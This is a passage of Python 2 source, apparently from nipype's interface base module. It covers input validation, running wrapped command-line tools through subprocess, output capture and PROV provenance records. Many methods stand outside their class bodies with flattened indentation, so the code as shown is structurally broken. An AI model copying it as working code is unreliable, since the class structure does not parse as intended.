    opthelpstr = ['', '\t[Optional]']
    for name, spec in sorted(inputs.traits(mandatory=None,
                                           transient=None).items()):
        opthelpstr += cls._get_trait_desc(inputs, name, spec)
    if manhelpstr:
        helpstr += manhelpstr
    if opthelpstr:
        helpstr += opthelpstr
    return helpstr
@classmethod
def _outputs_help(cls):
    """ Prints description for output parameters
    """
    helpstr = ['Outputs::', '']
    if cls.output_spec:
        outputs = cls.output_spec()
        for name, spec in sorted(outputs.traits(transient=None).items()):
            helpstr += cls._get_trait_desc(outputs, name, spec)
    # nothing was appended -> advertise "None"
    if len(helpstr) == 2:
        helpstr += ['\tNone']
    return helpstr
def _outputs(self):
    """Return a fresh output-spec instance, or None when the class
    declares no output_spec."""
    if not self.output_spec:
        return None
    return self.output_spec()
@classmethod
def _get_filecopy_info(cls):
    """ Provides information about file inputs to copy or link to cwd.
    Necessary for pipeline operation
    """
    info = []
    if cls.input_spec is None:
        return info
    # report every input trait that carries `copyfile` metadata
    metadata = dict(copyfile=lambda t: t is not None)
    for name, spec in sorted(cls.input_spec().traits(**metadata).items()):
        info.append(dict(key=name,
                         copy=spec.copyfile))
    return info
def _check_requires(self, spec, name, value):
    """ check if required inputs are satisfied
    """
    if spec.requires:
        # True for each member of the `requires` group that is unset
        values = [not isdefined(getattr(self.inputs, field))
                  for field in spec.requires]
        # `name` is set but at least one of its prerequisites is missing
        if any(values) and isdefined(value):
            msg = ("%s requires a value for input '%s' because one of %s "
                   "is set. For a list of required inputs, see %s.help()" %
                   (self.__class__.__name__, name,
                    ', '.join(spec.requires), self.__class__.__name__))
            raise ValueError(msg)
def _check_xor(self, spec, name, value):
    """ check if mutually exclusive inputs are satisfied
    """
    if spec.xor:
        values = [isdefined(getattr(self.inputs, field))
                  for field in spec.xor]
        # at least one member of the xor group must be set
        if not any(values) and not isdefined(value):
            msg = ("%s requires a value for one of the inputs '%s'. "
                   "For a list of required inputs, see %s.help()" %
                   (self.__class__.__name__, ', '.join(spec.xor),
                    self.__class__.__name__))
            raise ValueError(msg)
def _check_mandatory_inputs(self):
    """ Raises an exception if a mandatory input is Undefined
    """
    for name, spec in self.inputs.traits(mandatory=True).items():
        value = getattr(self.inputs, name)
        self._check_xor(spec, name, value)
        # an unset mandatory input is only tolerated inside an xor group
        if not isdefined(value) and spec.xor is None:
            msg = ("%s requires a value for input '%s'. "
                   "For a list of required inputs, see %s.help()" %
                   (self.__class__.__name__, name, self.__class__.__name__))
            raise ValueError(msg)
        if isdefined(value):
            self._check_requires(spec, name, value)
    # optional inputs may still carry `requires` metadata
    for name, spec in self.inputs.traits(mandatory=None,
                                         transient=None).items():
        self._check_requires(spec, name, getattr(self.inputs, name))
def _check_version_requirements(self, trait_object, raise_exception=True):
    """ Raises an exception on version mismatch

    NOTE(review): returns None when the version string is falsy but a
    list of unavailable trait names otherwise; callers should handle
    both shapes.
    """
    unavailable_traits = []
    version = LooseVersion(str(self.version))
    if not version:
        return
    # check minimum version
    check = dict(min_ver=lambda t: t is not None)
    names = trait_object.trait_names(**check)
    for name in names:
        min_ver = LooseVersion(str(trait_object.traits()[name].min_ver))
        if min_ver > version:
            unavailable_traits.append(name)
            # only raise when the too-new trait is actually set
            if not isdefined(getattr(trait_object, name)):
                continue
            if raise_exception:
                raise Exception('Trait %s (%s) (version %s < required %s)' %
                                (name, self.__class__.__name__,
                                 version, min_ver))
    # check maximum version
    check = dict(max_ver=lambda t: t is not None)
    names = trait_object.trait_names(**check)
    for name in names:
        max_ver = LooseVersion(str(trait_object.traits()[name].max_ver))
        if max_ver < version:
            unavailable_traits.append(name)
            if not isdefined(getattr(trait_object, name)):
                continue
            if raise_exception:
                raise Exception('Trait %s (%s) (version %s > required %s)' %
                                (name, self.__class__.__name__,
                                 version, max_ver))
    return unavailable_traits
def _run_interface(self, runtime):
    """ Core function that executes interface

    Must be overridden by subclasses; receives and returns the runtime
    Bunch.
    """
    raise NotImplementedError
def run(self, **inputs):
    """Execute this interface.

    This interface will not raise an exception if runtime.returncode is
    non-zero.

    Parameters
    ----------
    inputs : allows the interface settings to be updated

    Returns
    -------
    results : an InterfaceResult object containing a copy of the instance
    that was executed, provenance information and, if successful, results
    """
    self.inputs.set(**inputs)
    self._check_mandatory_inputs()
    self._check_version_requirements(self.inputs)
    interface = self.__class__
    # initialize provenance tracking
    env = deepcopy(os.environ.data)
    runtime = Bunch(cwd=os.getcwd(),
                    returncode=None,
                    duration=None,
                    environ=env,
                    startTime=dt.isoformat(dt.utcnow()),
                    endTime=None,
                    platform=platform.platform(),
                    hostname=getfqdn(),
                    version=self.version)
    try:
        runtime = self._run_interface(runtime)
        outputs = self.aggregate_outputs(runtime)
        runtime.endTime = dt.isoformat(dt.utcnow())
        timediff = parseutc(runtime.endTime) - parseutc(runtime.startTime)
        # duration in seconds; microseconds scale by 1e6 (was /100000.,
        # overstating the fractional part by 10x)
        runtime.duration = (timediff.days * 86400 + timediff.seconds +
                            timediff.microseconds / 1000000.)
        results = InterfaceResult(interface, runtime,
                                  inputs=self.inputs.get_traitsfree(),
                                  outputs=outputs)
        prov_record = self.write_provenance(results)
        results.provenance = prov_record
    except Exception as e:
        runtime.endTime = dt.isoformat(dt.utcnow())
        timediff = parseutc(runtime.endTime) - parseutc(runtime.startTime)
        runtime.duration = (timediff.days * 86400 + timediff.seconds +
                            timediff.microseconds / 1000000.)
        if len(e.args) == 0:
            # was ("") which tuple-ifies to (); keep a real one-element
            # tuple so the message concatenation below applies
            e.args = ("",)
        message = "\nInterface %s failed to run." % self.__class__.__name__
        if config.has_option('logging', 'interface_level') and \
                config.get('logging', 'interface_level').lower() == 'debug':
            inputs_str = "Inputs:" + str(self.inputs) + "\n"
        else:
            inputs_str = ''
        if len(e.args) == 1 and isinstance(e.args[0], str):
            e.args = (e.args[0] + " ".join([message, inputs_str]),)
        else:
            e.args += (message, )
            if inputs_str != '':
                e.args += (inputs_str, )
        # exception raising inhibition for special cases
        import traceback
        runtime.traceback = traceback.format_exc()
        runtime.traceback_args = e.args
        inputs = None
        try:
            inputs = self.inputs.get_traitsfree()
        except Exception:
            # best effort: an inputs snapshot is optional in failure results
            pass
        results = InterfaceResult(interface, runtime, inputs=inputs)
        try:
            prov_record = self.write_provenance(results)
        except Exception:
            prov_record = None
        results.provenance = prov_record
        # honor ignore_exception: log-and-continue instead of re-raising
        if hasattr(self.inputs, 'ignore_exception') and \
                isdefined(self.inputs.ignore_exception) and \
                self.inputs.ignore_exception:
            pass
        else:
            raise
    return results
def _list_outputs(self):
    """ List the expected outputs

    Subclasses that declare an output_spec must override this; classes
    without outputs legitimately return None.
    """
    if self.output_spec:
        raise NotImplementedError
    else:
        return None
def aggregate_outputs(self, runtime=None, needed_outputs=None):
    """ Collate expected outputs and check for existence

    Copies the values predicted by _list_outputs onto the output spec,
    restricted to ``needed_outputs`` when given.
    """
    predicted_outputs = self._list_outputs()
    outputs = self._outputs()
    if predicted_outputs:
        _unavailable_outputs = []
        if outputs:
            _unavailable_outputs = \
                self._check_version_requirements(self._outputs())
        for key, val in predicted_outputs.items():
            if needed_outputs and key not in needed_outputs:
                continue
            if key in _unavailable_outputs:
                raise KeyError(('Output trait %s not available in version '
                                '%s of interface %s. Please inform '
                                'developers.') % (key, self.version,
                                                  self.__class__.__name__))
            try:
                setattr(outputs, key, val)
                # re-read to trigger trait validation
                _ = getattr(outputs, key)
            except TraitError, error:
                # an "an existing file/directory" validation failure is
                # reported as a missing output file
                if hasattr(error, 'info') and \
                        error.info.startswith("an existing"):
                    msg = ("File/Directory '%s' not found for %s output "
                           "'%s'." % (val, self.__class__.__name__, key))
                    raise FileNotFoundError(msg)
                else:
                    raise error
    return outputs
@property
def version(self):
    """Tool version; None unless the subclass set ``_version`` (or the
    ``stop_on_unknown_version`` config option forces an error)."""
    if self._version is None:
        if str2bool(config.get('execution', 'stop_on_unknown_version')):
            raise ValueError('Interface %s has no version information' %
                             self.__class__.__name__)
    return self._version
def write_provenance(self, results, filename='provenance', format='turtle'):
    """Write a PROV record describing this run to ``filename``.

    Serializes as turtle, falling back to provn/json when rdf support
    is unavailable, and returns the ProvBundle.
    """
    runtime = results.runtime
    interface = results.interface
    inputs = results.inputs
    outputs = results.outputs
    classname = self.__class__.__name__
    foaf = pm.Namespace("foaf", "http://xmlns.com/foaf/0.1/")
    dcterms = pm.Namespace("dcterms", "http://purl.org/dc/terms/")
    nipype = pm.Namespace("nipype", "http://nipy.org/nipype/terms/")
    get_id = lambda: nipype[uuid1().hex]
    # create a provenance container
    g = pm.ProvBundle()
    # Set the default _namespace name
    # g.set_default_namespace(nipype.get_uri())
    g.add_namespace(foaf)
    g.add_namespace(dcterms)
    g.add_namespace(nipype)
    a0_attrs = {nipype['module']: self.__module__,
                nipype["interface"]: classname,
                pm.PROV["label"]: classname,
                nipype['duration']: safe_encode(runtime.duration),
                nipype['working_directory']: safe_encode(runtime.cwd),
                nipype['return_code']: runtime.returncode,
                nipype['platform']: safe_encode(runtime.platform),
                nipype['version']: safe_encode(runtime.version),
                }
    try:
        a0_attrs[foaf["host"]] = pm.URIRef(runtime.hostname)
    except AttributeError:
        a0_attrs[foaf["host"]] = pm.Literal(runtime.hostname,
                                            pm.XSD['anyURI'])
    try:
        # command-line details only exist for CommandLine-derived runs
        a0_attrs.update({nipype['command']: safe_encode(runtime.cmdline)})
        a0_attrs.update({nipype['command_path']:
                         safe_encode(runtime.command_path)})
        a0_attrs.update({nipype['dependencies']:
                         safe_encode(runtime.dependencies)})
    except AttributeError:
        pass
    a0 = g.activity(get_id(), runtime.startTime, runtime.endTime,
                    a0_attrs)
    # environment
    id = get_id()
    env_collection = g.collection(id)
    env_collection.add_extra_attributes({pm.PROV['type']:
                                         nipype['environment'],
                                         pm.PROV['label']: "Environment"})
    g.used(a0, id)
    # write environment entities
    for idx, (key, val) in enumerate(sorted(runtime.environ.items())):
        in_attr = {pm.PROV["label"]: key,
                   nipype["environment_variable"]: key,
                   nipype["value"]: safe_encode(val)}
        id = get_id()
        g.entity(id, in_attr)
        g.hadMember(env_collection, id)
    # write input entities
    if inputs:
        id = get_id()
        input_collection = g.collection(id)
        input_collection.add_extra_attributes({pm.PROV['type']:
                                               nipype['inputs'],
                                               pm.PROV['label']: "Inputs"})
        g.used(a0, id)
        for idx, (key, val) in enumerate(sorted(inputs.items())):
            in_attr = {pm.PROV["label"]: key,
                       nipype["in_port"]: key,
                       nipype["value"]: safe_encode(val)}
            id = get_id()
            g.entity(id, in_attr)
            g.hadMember(input_collection, id)
    # write output entities
    if outputs:
        id = get_id()
        output_collection = g.collection(id)
        outputs = outputs.get_traitsfree()
        output_collection.add_extra_attributes({pm.PROV['type']:
                                                nipype['outputs'],
                                                pm.PROV['label']:
                                                "Outputs"})
        g.wasGeneratedBy(output_collection, a0)
        for idx, (key, val) in enumerate(sorted(outputs.items())):
            out_attr = {pm.PROV["label"]: key,
                        nipype["out_port"]: key,
                        nipype["value"]: safe_encode(val)}
            id = get_id()
            g.entity(id, out_attr)
            g.hadMember(output_collection, id)
    # write runtime entities
    id = get_id()
    runtime_collection = g.collection(id)
    runtime_collection.add_extra_attributes({pm.PROV['type']:
                                             nipype['runtime'],
                                             pm.PROV['label']:
                                             "RuntimeInfo"})
    g.wasGeneratedBy(runtime_collection, a0)
    for key, value in sorted(runtime.items()):
        if not value:
            continue
        if key not in ['stdout', 'stderr', 'merged']:
            continue
        attr = {pm.PROV["label"]: key,
                nipype[key]: safe_encode(value)}
        id = get_id()
        # bug fix: the entity must be created under the same id that is
        # registered via hadMember below (was ``g.entity(get_id(), attr)``,
        # which orphaned the membership reference)
        g.entity(id, attr)
        g.hadMember(runtime_collection, id)
    # create agents
    user_agent = g.agent(get_id(),
                         {pm.PROV["type"]: pm.PROV["Person"],
                          pm.PROV["label"]:
                          pwd.getpwuid(os.geteuid()).pw_name,
                          foaf["name"]:
                          safe_encode(pwd.getpwuid(os.geteuid()).pw_name)})
    agent_attr = {pm.PROV["type"]: pm.PROV["SoftwareAgent"],
                  pm.PROV["label"]: "Nipype",
                  foaf["name"]: safe_encode("Nipype")}
    for key, value in get_info().items():
        agent_attr.update({nipype[key]: safe_encode(value)})
    software_agent = g.agent(get_id(), agent_attr)
    g.wasAssociatedWith(a0, user_agent, None, None,
                        {pm.PROV["Role"]: safe_encode("LoggedInUser")})
    g.wasAssociatedWith(a0, software_agent, None, None,
                        {pm.PROV["Role"]: safe_encode("Software")})
    # write provenance
    try:
        if format in ['turtle', 'all']:
            g.rdf().serialize(filename + '.ttl', format='turtle')
    except (ImportError, NameError):
        format = 'all'
    finally:
        if format in ['provn', 'all']:
            with open(filename + '.provn', 'wt') as fp:
                fp.writelines(g.get_provn())
        if format in ['json', 'all']:
            with open(filename + '.json', 'wt') as fp:
                pm.json.dump(g, fp, cls=pm.ProvBundle.JSONEncoder)
    return g
class Stream(object):
    """Function to capture stdout and stderr streams with timestamps

    stackoverflow.com/questions/4984549/merge-and-sync-stdout-and-stderr/5188359

    NOTE(review): buffer handling assumes Python 2 byte-strings;
    ``os.read`` returns bytes under Python 3 while ``self._buf`` starts
    as str — confirm before porting.
    """

    def __init__(self, name, impl):
        self._name = name      # label used to prefix every logged line
        self._impl = impl      # underlying file-like object
        self._buf = ''         # carry-over of a trailing partial line
        self._rows = []        # (timestamp, formatted line, raw line)
        self._lastidx = 0      # index of the first row not yet logged

    def fileno(self):
        "Pass-through for file descriptor."
        return self._impl.fileno()

    def read(self, drain=0):
        "Read from the file descriptor. If 'drain' set, read until EOF."
        while self._read(drain) is not None:
            if not drain:
                break

    def _read(self, drain):
        "Read from the file descriptor"
        fd = self.fileno()
        buf = os.read(fd, 4096)
        if not buf and not self._buf:
            # EOF with nothing buffered
            return None
        if '\n' not in buf:
            if not drain:
                # incomplete line: stash it until more data arrives
                self._buf += buf
                return []
        # prepend any data previously read, then split into lines and format
        buf = self._buf + buf
        if '\n' in buf:
            tmp, rest = buf.rsplit('\n', 1)
        else:
            tmp = buf
            rest = None
        self._buf = rest
        now = datetime.datetime.now().isoformat()
        rows = tmp.split('\n')
        self._rows += [(now, '%s %s:%s' % (self._name, now, r), r)
                       for r in rows]
        # log only the rows added since the previous call
        for idx in range(self._lastidx, len(self._rows)):
            iflogger.info(self._rows[idx][1])
        self._lastidx = len(self._rows)
def run_command(runtime, output=None, timeout=0.01):
    """Run a command, read stdout and stderr, prefix with timestamp.

    The returned runtime contains a merged stdout+stderr log with timestamps

    ``output`` selects the capture mode: 'stream', 'allatonce', 'file' or
    'none'.  NOTE(review): any other value leaves ``result`` empty and
    the final joins raise KeyError — confirm callers always pass a valid
    mode.
    """
    PIPE = subprocess.PIPE
    proc = subprocess.Popen(runtime.cmdline,
                            stdout=PIPE,
                            stderr=PIPE,
                            shell=True,
                            cwd=runtime.cwd,
                            env=runtime.environ)
    result = {}
    if output == 'stream':
        streams = [Stream('stdout', proc.stdout), Stream('stderr', proc.stderr)]

        def _process(drain=0):
            # pump whichever stream is readable; retry on EINTR
            try:
                res = select.select(streams, [], [], timeout)
            except select.error, e:
                iflogger.info(str(e))
                if e[0] == errno.EINTR:
                    return
                else:
                    raise
            else:
                for stream in res[0]:
                    stream.read(drain)

        while proc.returncode is None:
            proc.poll()
            _process()
        # drain remaining buffered output after exit
        _process(drain=1)
        # collect results, merge and return
        result = {}
        temp = []
        for stream in streams:
            rows = stream._rows
            temp += rows
            result[stream._name] = [r[2] for r in rows]
        # sort by timestamp to interleave stdout/stderr chronologically
        temp.sort()
        result['merged'] = [r[1] for r in temp]
    if output == 'allatonce':
        stdout, stderr = proc.communicate()
        result['stdout'] = stdout.split('\n')
        result['stderr'] = stderr.split('\n')
        result['merged'] = ''
    if output == 'file':
        errfile = os.path.join(runtime.cwd, 'stderr.nipype')
        outfile = os.path.join(runtime.cwd, 'stdout.nipype')
        stderr = open(errfile, 'wt')
        stdout = open(outfile, 'wt')
        proc = subprocess.Popen(runtime.cmdline,
                                stdout=stdout,
                                stderr=stderr,
                                shell=True,
                                cwd=runtime.cwd,
                                env=runtime.environ)
        ret_code = proc.wait()
        stderr.flush()
        stdout.flush()
        # NOTE(review): these handles are only closed by GC
        result['stdout'] = [line.strip() for line in open(outfile).readlines()]
        result['stderr'] = [line.strip() for line in open(errfile).readlines()]
        result['merged'] = ''
    if output == 'none':
        proc.communicate()
        result['stdout'] = []
        result['stderr'] = []
        result['merged'] = ''
    runtime.stderr = '\n'.join(result['stderr'])
    runtime.stdout = '\n'.join(result['stdout'])
    runtime.merged = result['merged']
    runtime.returncode = proc.returncode
    return runtime
def get_dependencies(name, environ):
    """Return library dependencies of a dynamically linked executable

    Uses otool on darwin, ldd on linux. Currently doesn't support windows.
    """
    # pick the platform-appropriate listing command
    if sys.platform == 'darwin':
        cmdline = 'otool -L `which %s`' % name
    elif 'linux' in sys.platform:
        cmdline = 'ldd `which %s`' % name
    else:
        return 'Platform %s not supported' % sys.platform
    proc = subprocess.Popen(cmdline,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            shell=True,
                            env=environ)
    o, e = proc.communicate()
    return o.rstrip()
class CommandLineInputSpec(BaseInterfaceInputSpec):
    """Inputs common to every CommandLine interface."""
    args = traits.Str(argstr='%s', desc='Additional parameters to the command')
    environ = traits.DictStrStr(desc='Environment variables', usedefault=True,
                                nohash=True)
    # mandatory but excluded from hashing; CommandLine.__init__ installs
    # the class-level default when the trait is unset
    terminal_output = traits.Enum('stream', 'allatonce', 'file', 'none',
                                  desc=('Control terminal output: `stream` - '
                                        'displays to terminal immediately, '
                                        '`allatonce` - waits till command is '
                                        'finished to display output, `file` - '
                                        'writes output to file, `none` - output'
                                        ' is ignored'),
                                  nohash=True, mandatory=True)
class CommandLine(BaseInterface):
    """Implements functionality to interact with command line programs
    class must be instantiated with a command argument

    Parameters
    ----------
    command : string
        define base immutable `command` you wish to run
    args : string, optional
        optional arguments passed to base `command`

    Examples
    --------
    >>> from nipype.interfaces.base import CommandLine
    >>> cli = CommandLine(command='ls', environ={'DISPLAY': ':1'})
    >>> cli.inputs.args = '-al'
    >>> cli.cmdline
    'ls -al'

    >>> cli.inputs.trait_get() # doctest: +NORMALIZE_WHITESPACE
    {'ignore_exception': False, 'terminal_output': 'stream',
    'environ': {'DISPLAY': ':1'}, 'args': '-al'}

    >>> cli.inputs.get_hashval()
    ({'args': '-al'}, 'a2f45e04a34630c5f33a75ea2a533cdd')
    """
    input_spec = CommandLineInputSpec
    _cmd = None                    # base command; set by subclass or ctor
    _version = None                # cached tool version
    _terminal_output = 'stream'    # class-wide terminal_output default
def __init__(self, command=None, **inputs):
    """Set the base command and wire up terminal_output handling.

    Raises
    ------
    Exception
        When neither the class (`_cmd`) nor the caller supplies a command.
    """
    super(CommandLine, self).__init__(**inputs)
    self._environ = None
    if not hasattr(self, '_cmd'):
        self._cmd = None
    if self.cmd is None and command is None:
        raise Exception("Missing command")
    if command:
        self._cmd = command
    # keep the instance default in sync with the trait value
    self.inputs.on_trait_change(self._terminal_output_update,
                                'terminal_output')
    if not isdefined(self.inputs.terminal_output):
        self.inputs.terminal_output = self._terminal_output
    else:
        self._terminal_output_update()
def _terminal_output_update(self):
    # mirror the trait value onto the instance-level default
    self._terminal_output = self.inputs.terminal_output
@classmethod
def set_default_terminal_output(cls, output_type):
    """Set the default terminal output for CommandLine subclasses.

    This sets the class-wide default; it does not update the output
    type of any existing instances. For those, assign the
    <instance>.inputs.terminal_output trait directly.
    """
    if output_type in ['stream', 'allatonce', 'file', 'none']:
        cls._terminal_output = output_type
    else:
        raise AttributeError('Invalid terminal output_type: %s' %
                             output_type)
@property
def cmd(self):
    """sets base command, immutable"""
    return self._cmd
@property
def cmdline(self):
    """ `command` plus any arguments (args)
    validates arguments and generates command line"""
    self._check_mandatory_inputs()
    allargs = self._parse_inputs()
    allargs.insert(0, self.cmd)
    return ' '.join(allargs)
def raise_exception(self, runtime):
    """Raise a RuntimeError summarizing a failed command run."""
    details = (
        "Command:\n{0}\n"
        "Standard output:\n{1}\n"
        "Standard error:\n{2}\n"
        "Return code: {3}".format(runtime.cmdline,
                                  runtime.stdout,
                                  runtime.stderr,
                                  str(runtime.returncode)))
    raise RuntimeError(details)
@classmethod
def help(cls, returnhelp=False):
    """Print (or return) class help, prefixed with the wrapped command."""
    allhelp = super(CommandLine, cls).help(returnhelp=True)
    allhelp = "Wraps command **%s**\n\n" % cls._cmd + allhelp
    if returnhelp:
        return allhelp
    else:
        print(allhelp)
def _get_environ(self):
    """Build environment overrides: configured DISPLAY plus any
    values from the ``environ`` input trait."""
    out_environ = {}
    try:
        display_var = config.get('execution', 'display_variable')
        out_environ = {'DISPLAY': display_var}
    except NoOptionError:
        # no configured display variable: leave environment untouched
        pass
    if isdefined(self.inputs.environ):
        out_environ.update(self.inputs.environ)
    return out_environ
def version_from_command(self, flag='-v'):
    """Return the output of running ``cmd flag`` (default ``-v``).

    Returns None when the executable cannot be found on the search path.
    """
    cmdname = self.cmd.split()[0]
    env = deepcopy(os.environ.data)
    out_environ = self._get_environ()
    env.update(out_environ)
    # bug fix: _exists_in_path requires the environment mapping and
    # returns a (found, path) tuple -- the old call passed one argument
    # (TypeError) and would have treated the tuple as always-true
    exists, _ = self._exists_in_path(cmdname, env)
    if exists:
        proc = subprocess.Popen(' '.join((cmdname, flag)),
                                shell=True,
                                env=env,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                )
        o, e = proc.communicate()
        return o
def _run_interface(self, runtime, correct_return_codes=(0,)):
    """Execute command via subprocess

    Parameters
    ----------
    runtime : passed by the run function

    Returns
    -------
    runtime : updated runtime information
        adds stdout, stderr, merged, cmdline, dependencies, command_path

    Note: the default for ``correct_return_codes`` is a tuple rather
    than the previous mutable list literal.
    """
    setattr(runtime, 'stdout', None)
    setattr(runtime, 'stderr', None)
    setattr(runtime, 'cmdline', self.cmdline)
    out_environ = self._get_environ()
    runtime.environ.update(out_environ)
    executable_name = self.cmd.split()[0]
    exist_val, cmd_path = self._exists_in_path(executable_name,
                                               runtime.environ)
    if not exist_val:
        raise IOError("%s could not be found on host %s" %
                      (self.cmd.split()[0], runtime.hostname))
    setattr(runtime, 'command_path', cmd_path)
    setattr(runtime, 'dependencies', get_dependencies(executable_name,
                                                      runtime.environ))
    runtime = run_command(runtime, output=self.inputs.terminal_output)
    if runtime.returncode is None or \
            runtime.returncode not in correct_return_codes:
        self.raise_exception(runtime)
    return runtime
def _exists_in_path(self, cmd, environ):
    """Return ``(True, full_path)`` when ``cmd`` is found on the search
    path, else ``(False, None)``.

    The PATH is taken from ``environ`` when present, otherwise from
    os.environ; PATHEXT suffixes (Windows) are also tried.

    Based on a code snippet from
    http://orip.org/2009/08/python-checking-if-executable-exists-in.html
    """
    if 'PATH' in environ:
        search_paths = environ.get("PATH")
    else:
        search_paths = os.environ.get("PATH", "")
    extensions = os.environ.get("PATHEXT", "").split(os.pathsep)
    for directory in search_paths.split(os.pathsep):
        candidate = os.path.join(directory, cmd)
        candidates = [candidate] + [candidate + ext for ext in extensions]
        for filename in candidates:
            if os.path.exists(filename):
                return True, filename
    return False, None
def _format_arg(self, name, trait_spec, value):
    """A helper function for _parse_inputs

    Formats a trait containing argstr metadata
    """
    argstr = trait_spec.argstr
    if trait_spec.is_trait_type(traits.Bool) and "%" not in argstr:
        if value:
            # Boolean options have no format string. Just append options
            # if True.
            return argstr
        else:
            return None
    # traits.Either turns into traits.TraitCompound and does not have any
    # inner_traits
    elif trait_spec.is_trait_type(traits.List) \
        or (trait_spec.is_trait_type(traits.TraitCompound)
            and isinstance(value, list)):
        # This is a bit simple-minded at present, and should be
        # construed as the default. If more sophisticated behavior
        # is needed, it can be accomplished with metadata (e.g.
        # format string for list member str'ification, specifying
        # the separator, etc.)
        # Depending on whether we stick with traitlets, and whether or
        # not we beef up traitlets.List, we may want to put some
        # type-checking code here as well
        sep = trait_spec.sep
        if sep is None:
            sep = ' '
        if argstr.endswith('...'):
            # repeatable option
            # --id %d... will expand to
            # --id 1 --id 2 --id 3 etc.,.
            argstr = argstr.replace('...', '')
            return sep.join([argstr % elt for elt in value])
        else:
            return argstr % sep.join(str(elt) for elt in value)
    else:
        # Append options using format string.
        return argstr % value
def _filename_from_source(self, name):
    """Resolve an auto-generated filename from its ``name_source`` trait.

    NOTE(review): when ``name_source`` is a list and none of its members
    is defined, ``name_source`` is never bound and this raises
    UnboundLocalError — confirm callers always define one source.
    """
    trait_spec = self.inputs.trait(name)
    retval = getattr(self.inputs, name)
    if isdefined(retval):
        # a '%s' placeholder is filled with the source trait's basename
        if "%s" in retval:
            if isinstance(trait_spec.name_source, list):
                for ns in trait_spec.name_source:
                    if isdefined(getattr(self.inputs, ns)):
                        name_source = ns
                        break
            else:
                name_source = trait_spec.name_source
            if name_source.endswith(os.path.sep):
                name_source = name_source[:-len(os.path.sep)]
            _, base, _ = split_filename(getattr(self.inputs, name_source))
            retval = os.path.abspath(retval % base)
            _, _, ext = split_filename(retval)
            if trait_spec.keep_extension and ext:
                return retval
            return self._overload_extension(retval)
    return retval
def _gen_filename(self, name):
    """Hook for subclasses to generate filenames for genfile traits."""
    raise NotImplementedError
def _overload_extension(self, value):
    """Hook for subclasses to adjust the extension of generated names."""
    return value
def _list_outputs(self):
    """Map name_source-generated filenames onto the output spec.

    Returns None (implicitly) when no input trait carries
    ``name_source`` metadata.
    """
    metadata = dict(name_source=lambda t: t is not None)
    out_names = self.inputs.traits(**metadata).keys()
    if out_names:
        outputs = self.output_spec().get()
        for name in out_names:
            outputs[name] = \
                os.path.abspath(self._filename_from_source(name))
        return outputs
def _parse_inputs(self, skip=None):
    """Parse all inputs using the ``argstr`` format string in the Trait.

    Any inputs that are assigned (not the default_value) are formatted
    to be added to the command line.

    Returns
    -------
    all_args : list
        A list of all inputs formatted for the command line.
    """
    all_args = []
    initial_args = {}
    final_args = {}
    # only traits with argstr metadata appear on the command line
    metadata = dict(argstr=lambda t: t is not None)
    for name, spec in sorted(self.inputs.traits(**metadata).items()):
        if skip and name in skip:
            continue
        value = getattr(self.inputs, name)
        if spec.genfile or spec.name_source:
            # auto-generated filenames take precedence over unset values
            value = self._filename_from_source(name)
            if not isdefined(value):
                value = self._gen_filename(name)
        if not isdefined(value):
            continue
        arg = self._format_arg(name, spec, value)
        if arg is None:
            continue
        pos = spec.position
        if pos is not None:
            # non-negative positions sort before free args, negative after
            if pos >= 0:
                initial_args[pos] = arg
            else:
                final_args[pos] = arg
        else:
            all_args.append(arg)
    first_args = [arg for pos, arg in sorted(initial_args.items())]
    last_args = [arg for pos, arg in sorted(final_args.items())]
    return first_args + all_args + last_args
class StdOutCommandLineInputSpec(CommandLineInputSpec):
    # shell redirection target; generated via _gen_outfilename when unset
    out_file = File(argstr="> %s", position=-1, genfile=True)
class StdOutCommandLine(CommandLine):
    """A CommandLine that redirects its stdout into a generated file."""
    input_spec = StdOutCommandLineInputSpec

    def _gen_filename(self, name):
        # bug fix: identity comparison (`name is 'out_file'`) relied on
        # string interning; use equality instead
        if name == 'out_file':
            return self._gen_outfilename()
        else:
            return None

    def _gen_outfilename(self):
        """Subclasses must return the generated stdout filename."""
        raise NotImplementedError
class MpiCommandLineInputSpec(CommandLineInputSpec):
    """Inputs for MpiCommandLine."""
    use_mpi = traits.Bool(False,
                          desc="Whether or not to run the command with mpiexec",
                          usedefault=True)
    n_procs = traits.Int(desc="Num processors to specify to mpiexec. Do not "
                         "specify if this is managed externally (e.g. through "
                         "SGE)")
class MpiCommandLine(CommandLine):
    '''Implements functionality to interact with command line programs
    that can be run with MPI (i.e. using 'mpiexec').

    Examples
    --------
    >>> from nipype.interfaces.base import MpiCommandLine
    >>> mpi_cli = MpiCommandLine(command='my_mpi_prog')
    >>> mpi_cli.inputs.args = '-v'
    >>> mpi_cli.cmdline
    'my_mpi_prog -v'

    >>> mpi_cli.inputs.use_mpi = True
    >>> mpi_cli.inputs.n_procs = 8
    >>> mpi_cli.cmdline
    'mpiexec -n 8 my_mpi_prog -v'
    '''
    input_spec = MpiCommandLineInputSpec

    @property
    def cmdline(self):
        """Adds 'mpiexec' to beginning of command"""
        result = []
        if self.inputs.use_mpi:
            result.append('mpiexec')
            # -n only makes sense when mpiexec is used
            if self.inputs.n_procs:
                result.append('-n %d' % self.inputs.n_procs)
        result.append(super(MpiCommandLine, self).cmdline)
        return ' '.join(result)
class SEMLikeCommandLine(CommandLine):
    """In SEM derived interface all outputs have corresponding inputs.
    However, some SEM commands create outputs that are not defined in the XML.
    In those cases one has to create a subclass of the autogenerated one and
    overload the _list_outputs method. _outputs_from_inputs should still be
    used but only for the reduced (by excluding those that do not have
    corresponding inputs) list of outputs.
    """

    def _list_outputs(self):
        outputs = self.output_spec().get()
        return self._outputs_from_inputs(outputs)

    def _outputs_from_inputs(self, outputs):
        # NOTE(review): relies on subclasses providing _outputs_filenames
        for name in outputs.keys():
            corresponding_input = getattr(self.inputs, name)
            if isdefined(corresponding_input):
                if (isinstance(corresponding_input, bool) and
                        corresponding_input):
                    # a True flag maps to the canned filename for this output
                    outputs[name] = \
                        os.path.abspath(self._outputs_filenames[name])
                else:
                    if isinstance(corresponding_input, list):
                        outputs[name] = [os.path.abspath(inp)
                                         for inp in corresponding_input]
                    else:
                        outputs[name] = os.path.abspath(corresponding_input)
        return outputs

    def _format_arg(self, name, spec, value):
        # boolean output flags are replaced by their canned filenames
        if name in self._outputs_filenames.keys():
            if isinstance(value, bool):
                if value:
                    value = os.path.abspath(self._outputs_filenames[name])
                else:
                    return ""
        return super(SEMLikeCommandLine, self)._format_arg(name, spec, value)
class MultiPath(traits.List):
    """ Abstract class - shared functionality of input and output MultiPath
    """
    def validate(self, object, name, value):
